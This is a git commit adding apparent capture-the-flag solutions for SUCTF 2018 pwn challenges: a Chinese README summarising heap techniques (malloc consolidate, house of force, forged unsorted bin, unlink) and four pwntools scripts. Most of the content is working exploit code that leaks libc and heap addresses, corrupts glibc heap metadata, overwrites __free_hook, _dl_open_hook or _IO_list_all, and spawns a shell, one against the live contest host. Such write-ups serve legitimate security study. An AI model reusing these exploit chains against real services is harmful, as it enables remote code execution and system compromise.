add suctf

hzshang · May 31, 2018 · fb7e2b6 · fb7e2b6
1 parent 1ed37a6
commit fb7e2b6
Show file tree

Hide file tree

Showing 19 changed files with 272 additions and 0 deletions.
diff --git a/2018/suctf/README.md b/2018/suctf/README.md
@@ -0,0 +1,13 @@
+### noend  
+知识点：  
+
+- malloc consolidate  
+- house of force  
+
+题目对malloc的返回结果不做检查，能够在任一个地方写上一个\x00，首先通过利用 malloc_consolidate可以将unsort bin的地址写到堆上leak出来，然后再申请一个超大的chunk，此时堆的剩余chunk不足，libc会重新mmap出一块空间，当作arena使用，并且该arena的下面就是新开辟的堆空间。使用相同的方法leak出该地址，将该arena的topchunk尾字节改为\x00，利用house of force 在free hook上写上system地址。
+
+### note
+堆上任意写，伪造unsort bin，三重释放攻击  
+
+### offbyone
+unlink
diff --git a/2018/suctf/heapprint/hack.py b/2018/suctf/heapprint/hack.py
@@ -0,0 +1,30 @@
+#! /usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+# Copyright © 2018 hzshang <[email protected]>
+
+from pwn import *
+context.log_level="debug"
+pwn_file="./heapprint"
+elf=ELF(pwn_file)
+
+if len(sys.argv)==1:
+    conn=process(pwn_file)
+    pid=conn.pid
+else:
+    conn=remote("pwn.it",3333)
+    pid=0
+
+def debug():
+    log.debug("process pid:%d"%pid)
+    pause()
+
+off=int(conn.recvline())
+
+debug()
+
+conn.sendline("%1c%1$n")
+
+
+
+conn.interactive()
diff --git a/2018/suctf/heapprint/heapprint b/2018/suctf/heapprint/heapprint
diff --git a/2018/suctf/heapprint/heapprint.i64 b/2018/suctf/heapprint/heapprint.i64
diff --git a/2018/suctf/heapprint/libc-2.23.so b/2018/suctf/heapprint/libc-2.23.so
diff --git a/2018/suctf/noend/hack.py b/2018/suctf/noend/hack.py
@@ -0,0 +1,57 @@
+#! /usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+# Copyright © 2018 hzshang <[email protected]>
+
+from pwn import *
+context.log_level="debug"
+pwn_file="./noend"
+elf=ELF(pwn_file)
+os.environ["LD_LIBRARY_PATH"]="/dbg64/lib"
+#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
+libc=ELF("/dbg64/lib/libc.so.6")
+arena_address=0
+
+if len(sys.argv)==1:
+    conn=process(pwn_file)
+    pid=conn.pid
+else:
+    conn=remote("pwn.it",3333)
+    pid=0
+
+def debug():
+    log.debug("process pid:%d"%pid)
+    log.debug("libc address:0x%x"%libc.address)
+    log.debug("arena address:0x%x"%arena_address)
+    pause()
+
+def add(size,content=None):
+    conn.send(str(size))
+    if content:
+        conn.send(content)
+        data=conn.recv()
+    else:
+        data=None
+    return data
+
+add(0x28,"a"*8)
+add(0x38,"a"*8)
+add(0x7f,"a"*8)
+data=add(0x20,"a"*8)
+#libc.address=u64(data[8:16])-0x3c4b78
+libc.address=u64(data[8:16])-libc.sym["main_arena"]-0x58
+add(libc.sym["__malloc_hook"]+1)
+add(0x28,"a"*8)
+add(0x38,"a"*8)
+add(0x7f,"a"*8)
+data=add(0x80,"a"*8)
+arena_address=u64(data[8:16])-0x78
+
+add(0x30,"a")
+add(0x180,p64(libc.sym["__free_hook"]-(arena_address+0xb00)+libc.sym["system"]-8)*(0x180/8))
+add(arena_address+0x79)
+add(libc.sym["__free_hook"]-(arena_address+0xb00)-0x18,"a")
+
+add(0x30,"/bin/sh\x00")
+
+conn.interactive()
diff --git a/2018/suctf/noend/libc.so.6 b/2018/suctf/noend/libc.so.6
diff --git a/2018/suctf/noend/noend b/2018/suctf/noend/noend
diff --git a/2018/suctf/noend/noend.i64 b/2018/suctf/noend/noend.i64
diff --git a/2018/suctf/note/hack.py b/2018/suctf/note/hack.py
@@ -0,0 +1,82 @@
+#! /usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+# Copyright © 2018 hzshang <[email protected]>
+
+from pwn import *
+context.log_level="debug"
+pwn_file="./note"
+os.environ["LD_PRELOAD"]="./libc6_2.24-12ubuntu1_amd64.so"
+elf=ELF(pwn_file)
+libc=ELF("./libc6_2.24-12ubuntu1_amd64.so")
+#libc=elf.libc
+
+heap_address=0
+if len(sys.argv)==1:
+    conn=process(pwn_file)
+    pid=conn.pid
+else:
+    conn=remote("pwn.suctf.asuri.org",20003)
+    pid=0
+
+def debug():
+    log.debug("process pid:%d"%pid)
+    log.debug("libc address:0x%x"%libc.address)
+    log.debug("heap address:0x%x"%heap_address)
+    pause()
+
+def add(size,data):
+    conn.sendlineafter("Choice>>","1")
+    conn.sendlineafter("Size:",str(size))
+    conn.sendlineafter("Content:",data)
+
+
+def show(idx):
+    conn.sendlineafter("Choice>>","2")
+    conn.sendlineafter("Index:",str(idx))
+    conn.recvuntil("Content:")
+    return conn.recvline(keepends=False)
+
+def panda():
+    conn.sendlineafter("Choice>>","3")
+    conn.sendlineafter("This is a Pandora box,are you sure to open it?(yes:1)","1")
+    data1=conn.recvline(keepends=False)
+    data2=conn.recvline(keepends=False)
+    return data1,data2
+
+add(0xd90,"a"*0xd98+p64(0x0141))
+add(0x200,"a")
+add(0x200,"a")
+panda()
+data=show(0)
+libc.address=u64(data.ljust(8,"\x00"))-0x3bfb58
+add(0x300,"a")
+heap_address=u64(show(0).ljust(8,"\x00"))-0xec0
+f={
+    0x28:p64(0x61),
+    0x38:p64(heap_address+0xf50),
+    0x58:p64(0x401),
+    0x68:p64(heap_address+0xef0),
+    0x80:p64(libc.address+0xf241b),
+    0x88:p64(0x411),
+    0x98:p64(heap_address+0xf80),
+    0xb8:p64(0x61),
+    0xc8:p64(heap_address+0xfa0),
+}
+add(0x50,fit(f,filler="\x00"))
+f={
+    0x28:p64(0x401),
+    0x38:p64(libc.sym["_dl_open_hook"]-0x10),
+    0x48:p64(libc.sym["_dl_open_hook"]-0x20)[:6],
+}
+add(0x50,fit(f,filler="\x00"))
+add(0x50,"a")
+
+conn.sendline("1")
+conn.sendline("1234")
+conn.interactive()
+
+
+
+
+
diff --git a/2018/suctf/note/libc6_2.24-12ubuntu1_amd64.so b/2018/suctf/note/libc6_2.24-12ubuntu1_amd64.so
diff --git a/2018/suctf/note/note b/2018/suctf/note/note
diff --git a/2018/suctf/note/note.i64 b/2018/suctf/note/note.i64
diff --git a/2018/suctf/offbyone/hack.py b/2018/suctf/offbyone/hack.py
@@ -0,0 +1,90 @@
+#! /usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+# Copyright © 2018 hzshang <[email protected]>
+
+from pwn import *
+context.log_level="debug"
+os.environ["LD_LIBRARY_PATH"]="/dbg64/lib/"
+pwn_file="./offbyone"
+elf=ELF(pwn_file)
+libc=ELF("/dbg64/lib/libc.so.6")
+
+heap_address=0
+if len(sys.argv)==1:
+    conn=process(pwn_file)
+    pid=conn.pid
+else:
+    conn=remote("pwn.it",3333)
+    pid=0
+
+def debug():
+    log.debug("libc address: 0x%x"%libc.address)
+    log.debug("heap address: 0x%x"%heap_address)
+    log.debug("process pid:%d"%pid)
+    pause()
+
+def add(size,content):
+    conn.sendlineafter("4:edit\n","1")
+    conn.sendlineafter("input len\n",str(size))
+    conn.sendafter("input your data\n",content)
+
+def show(idx):
+    conn.sendlineafter("4:edit\n","3")
+    conn.sendlineafter("input id\n",str(idx))
+    return conn.recvuntil("1:creat")[:-len("1:creat")]
+
+def dele(idx):
+    conn.sendlineafter("4:edit\n","2")
+    conn.sendlineafter("input id\n",str(idx))
+
+def edit(idx,content):
+    conn.sendlineafter("4:edit\n","4")
+    conn.sendlineafter("input id\n",str(idx))
+    conn.send(content)
+
+add(0xd8,"a")
+add(0xd8,"a")
+add(0xd8,"a")
+add(0xd8,"a")
+add(0xd8,"a")
+add(0xd8,"a")
+add(0xd8,"a"*0xd8)
+add(0xd8,"a")
+add(0xd8,"a"*0xd6)
+f={
+    0xd0:p64(0x700),
+    0xd8:p64(0xe0),
+}
+edit(6,fit(f,filler="\x00"))
+dele(7)
+add(0xd8,"a"*0xd0)
+libc.address=u64(show(1).ljust(8,"\x00"))-libc.sym["main_arena"]-0x58
+dele(3)
+add(0xf0,"a"*0xf0)
+heap_address=u64(show(1).ljust(8,"\x00"))-0x3e0
+f={
+    0x88:p64(0xe1),
+    0x90:p64(heap_address+0x20),
+    0x98:p64(heap_address+0x3a0),
+}
+#edit(7,fit(f,filler="\x00"))
+f={
+    0xb8:p64(0xe1),
+    0xc0:p64(heap_address+0x20),
+    0xc8:p64(libc.sym["main_arena"]+0x128),
+}
+edit(3,fit(f,filler="\x00"))
+add(0xd0,"a"*0xd0)
+f={
+    0x38:p64(0x91),
+    0x40:p64(0),
+    0x48:p64(libc.sym["_IO_list_all"]-0x10),
+}
+edit(9,fit(f,filler="\x00"))
+debug()
+
+conn.sendlineafter("4:edit\n","1")
+conn.sendlineafter("input len\n",str(0x80))
+conn.interactive()
+
diff --git a/2018/suctf/offbyone/libc.so.6 b/2018/suctf/offbyone/libc.so.6
diff --git a/2018/suctf/offbyone/offbyone b/2018/suctf/offbyone/offbyone
diff --git a/2018/suctf/offbyone/offbyone.i64 b/2018/suctf/offbyone/offbyone.i64
diff --git a/asciifull.jpg b/asciifull.jpg
diff --git a/reg.png b/reg.png